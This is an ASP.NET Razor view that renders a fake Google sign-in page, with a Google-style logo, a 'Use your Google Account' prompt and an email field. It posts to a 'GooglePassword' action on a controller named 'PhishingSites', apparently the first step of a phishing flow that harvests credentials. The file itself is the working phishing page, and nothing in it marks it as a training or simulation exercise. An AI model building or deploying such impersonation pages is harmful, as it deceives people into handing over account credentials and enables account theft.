@{
    Layout = null;
}

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Form</title>
    <link rel="stylesheet" href="~/css/google.css">
</head>
<body>
<div class="box">
    <div class="logo">
        <img src="~/images/Untitled.png" id="google-img"/>
    </div>
    <h2>Sign In</h2>
    <p>Use your Google Account</p>
    @using (Html.BeginForm("GooglePassword", "PhishingSites", FormMethod.Post)){
        <div class="inputBox">
            <input type="email" name="email" required onkeyup="this.setAttribute('value', this.value);"  value="">
            <label>Email</label>
        </div>
        <a class="forget" href="#">Did you forget your mail?</a>
        <div id="text">Not your computer? Use Guest mode to sign in privately. <a href="#" class="forget">Learn more</a> </div>
        <input type="submit" name="sign-in" value="Next">
    }
</div>
</body>
</html>